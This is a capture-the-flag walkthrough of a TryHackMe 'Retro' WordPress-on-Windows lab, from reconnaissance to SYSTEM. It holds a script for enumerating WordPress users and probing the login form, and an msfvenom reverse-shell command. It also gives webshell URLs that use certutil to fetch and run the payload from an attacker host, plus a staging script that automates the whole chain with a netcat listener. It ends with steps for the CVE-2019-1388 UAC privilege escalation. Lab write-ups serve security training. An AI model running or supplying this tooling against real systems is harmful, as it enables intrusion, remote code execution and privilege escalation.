TryHackMe-Retro

Difficulty: Easy

0x01 Information gathering

nmap

image-20200930114911464

http

image-20200930115719108

image-20200930115642890

wordpress

```bash
wpscan --url http://ip/retro -e u
```
```text
[+] URL: http://10.10.59.241/Retro/ [10.10.59.241]
[+] Started: Wed Sep 30 04:29:59 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Microsoft-IIS/10.0
 |  - X-Powered-By: PHP/7.1.29
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.59.241/Retro/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://10.10.59.241/Retro/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.59.241/Retro/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.59.241/retro/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
 |  - http://10.10.59.241/retro/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>

[+] WordPress theme in use: 90s-retro
 | Location: http://10.10.59.241/Retro/wp-content/themes/90s-retro/
 | Latest Version: 1.4.10 (up to date)
 | Last Updated: 2019-04-15T00:00:00.000Z
 | Readme: http://10.10.59.241/Retro/wp-content/themes/90s-retro/readme.txt
 | Style URL: http://10.10.59.241/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1
 | Style Name: 90s Retro
 | Style URI: https://organicthemes.com/retro-theme/
 | Description: Have you ever wished your WordPress blog looked like an old Geocities site from the 90s!? Probably n...
 | Author: Organic Themes
 | Author URI: https://organicthemes.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4.10 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.59.241/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1, Match: 'Version: 1.4.10'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:06 <=======================> (10 / 10) 100.00% Time: 00:00:06

[i] User(s) Identified:

[+] wade
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.59.241/retro/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Wade
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Wed Sep 30 04:30:21 2020
[+] Requests Done: 52
[+] Cached Requests: 6
[+] Data Sent: 10.477 KB
[+] Data Received: 239.011 KB
[+] Memory used: 171.227 MB
[+] Elapsed time: 00:00:21
```
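The three user-enumeration methods wpscan lists above (the unauthenticated wp-json users endpoint, the /?author=N redirect, and the wp-login.php error wording) can be reproduced by hand, which is worth doing when wpscan is unavailable or when you want to confirm a finding. The script below is an added example, not part of the original write-up: the JSON sample is constructed to match the shape of a WordPress 5.2 response rather than captured from the target, the BASE URL and the function names are assumptions, and the `wp_enum_*` and `wp_login_probe` functions need network access to the target.

```shell
#!/bin/sh
# Added example (not from the original write-up): wpscan's three user checks by hand.
# BASE is assumed; SAMPLE_USERS_JSON is a constructed sample, not target output.
BASE='http://10.10.59.241/retro'

SAMPLE_USERS_JSON='[{"id":1,"name":"Wade","url":"","description":"","link":"http://10.10.59.241/retro/index.php/author/wade/","slug":"wade","avatar_urls":{"96":"https://secure.gravatar.com/avatar/?s=96&d=mm&r=g"},"meta":[]}]'

wp_users_from_json() {
  # "Wp Json Api" check: /wp-json/wp/v2/users lists every user with a published
  # post, no authentication needed. "slug" is the lowercased login name, which is
  # what a password attack needs; "name" is only the display name.
  grep -o '"slug":"[^"]*"' | cut -d'"' -f4
}

wp_display_names_from_json() {
  # What the RSS feed and author pages leak: the display name ("Wade").
  grep -o '"name":"[^"]*"' | cut -d'"' -f4
}

author_slug_from_url() {
  # "Author Id Brute Forcing" check: /?author=N redirects to the author archive,
  # whose last path component is the login slug.
  u=${1%/}
  printf '%s\n' "${u##*/}"
}

classify_login_error() {
  # "Login Error Messages" check: wp-login.php tells a valid username apart from an
  # unknown one in its error text (WordPress 5.2 wording).
  case $1 in
    *"The password you entered for the username"*) echo valid ;;
    *"Invalid username"*) echo unknown ;;
    *) echo inconclusive ;;
  esac
}

wp_enum_users() {
  # Live version of the JSON check against $1 (defaults to BASE).
  curl -s "${1:-$BASE}/index.php/wp-json/wp/v2/users/?per_page=100&page=1" | wp_users_from_json
}

wp_enum_author_ids() {
  # Live version of the author-ID check: walk IDs 1..$2 and print the slugs that
  # redirect. curl's %{redirect_url} is the Location header, or empty if none.
  base=${1:-$BASE}
  max=${2:-10}
  i=1
  while [ "$i" -le "$max" ]; do
    loc=$(curl -s -o /dev/null -w '%{redirect_url}' "$base/?author=$i")
    case $loc in
      */author/*) printf '%s\t%s\n' "$i" "$(author_slug_from_url "$loc")" ;;
    esac
    i=$((i + 1))
  done
}

wp_login_probe() {
  # Live: POST a junk password for user $2 to $1/wp-login.php and classify the reply.
  classify_login_error "$(curl -s -d "log=$2&pwd=x&wp-submit=Log+In" "${1:-$BASE}/wp-login.php")"
}
```

Only the parsing helpers run offline; the live functions talk to the target. With XML-RPC enabled (the finding above), the same usernames can also be tested against xmlrpc.php, which is what the wordpress_xmlrpc_login reference in the output is about, and that path is often less rate-limited than wp-login.php.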

image-20200930123748045

image-20200930123806555

image-20200930131945379

Generate the shell first:

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=Your-IP LPORT=1234 -f exe -o shell-thm.exe
```

Then request the theme's 404 page (which now takes a cmd parameter) to download the shell and execute it:

```text
http://10.10.59.241/Retro/wp-content/themes/twentysixteen/404.php?cmd=certutil%20-urlcache%20-split%20-f%20http:%2f%2fYour-IP:8000%2fshell-thm.exe

http://10.10.59.241/Retro/wp-content/themes/twentysixteen/404.php?cmd=shell-thm.exe
```
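The two requests above can be scripted so the Windows command is percent-encoded in full (the hand-typed URL only encodes the slashes, which works here but breaks as soon as the command contains `&`, `%` or a quote) and so the payload is built, served and fired in one go. This is an added example, not the author's code: the WEBSHELL URL is the one used above, the `stage` argument and the function names are assumptions, and it presumes a listener is already waiting on LPORT.

```shell
#!/bin/sh
# Added example (not from the original write-up): percent-encode a Windows command
# for the cmd parameter of the backdoored 404.php and stage the msfvenom payload.
# WEBSHELL is the URL from the write-up; the "stage" argument is an assumption.
LC_ALL=C
export LC_ALL

WEBSHELL='http://10.10.59.241/Retro/wp-content/themes/twentysixteen/404.php'

urlencode() {
  # Percent-encode every byte outside the RFC 3986 unreserved set, one character
  # at a time, so spaces, slashes and colons in the command survive the trip
  # through curl and IIS untouched.
  s=$1
  out=''
  while [ -n "$s" ]; do
    c=${s%"${s#?}"}   # first character of $s
    s=${s#?}          # remainder of $s
    case $c in
      [A-Za-z0-9._~-]) out="$out$c" ;;
      *) out="$out$(printf '%%%02X' "'$c")" ;;
    esac
  done
  printf '%s' "$out"
}

webshell_url() {
  # $1 = URL of the PHP file that executes $_GET['cmd'], $2 = Windows command.
  printf '%s?cmd=%s' "$1" "$(urlencode "$2")"
}

stage_payload() {
  # $1 = LHOST, $2 = LPORT. A listener must already be running:  nc -lvnp "$2"
  lhost=$1
  lport=$2
  msfvenom -p windows/shell_reverse_tcp LHOST="$lhost" LPORT="$lport" -f exe -o shell-thm.exe
  python3 -m http.server 8000 &   # serve shell-thm.exe from the current directory
  srv=$!
  sleep 1
  # certutil -urlcache -split -f writes the file into the working directory of the
  # PHP process; the second request runs it from that same directory.
  curl -s "$(webshell_url "$WEBSHELL" "certutil -urlcache -split -f http://$lhost:8000/shell-thm.exe")"
  curl -s "$(webshell_url "$WEBSHELL" "shell-thm.exe")"
  kill "$srv"
}

# Usage: sh stage.sh stage <LHOST> <LPORT>
if [ "${1:-}" = "stage" ]; then
  stage_payload "$2" "$3"
fi
```

Run it as `sh stage.sh stage <LHOST> 1234` with `nc -lvnp 1234` open in another terminal. certutil -urlcache is a well-known LOLBin download pattern that EDR rules commonly flag; fine on a lab box, but on an engagement expect the download to show up in telemetry.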

Got a shell.

image-20200930131930082

RDP

After getting the password from the blog there was absolutely! no! need! to pop a reverse shell through WordPress, because you can just connect over RDP... I was halfway through before I remembered RDP was open too.

image-20200930133020922

CVE-2019-1388 (the Windows Certificate Dialog elevation-of-privilege bug) shows up several times in the Chrome browsing history.

image-20200930133116757

Detailed reproduction steps:

In short: when the UAC credential prompt appears, open the file's certificate details and click the issuer (CA) link, which launches a browser with the same elevated privileges as the prompt. In that browser choose "Save page as", type C:\windows\system32\*.* in the path box to jump straight into system32 with every file type listed (clicking through the folders by hand shows only directories), find cmd.exe, right-click it and open it; the resulting command prompt inherits the elevated privileges.

image-20200930134048061

😓,,,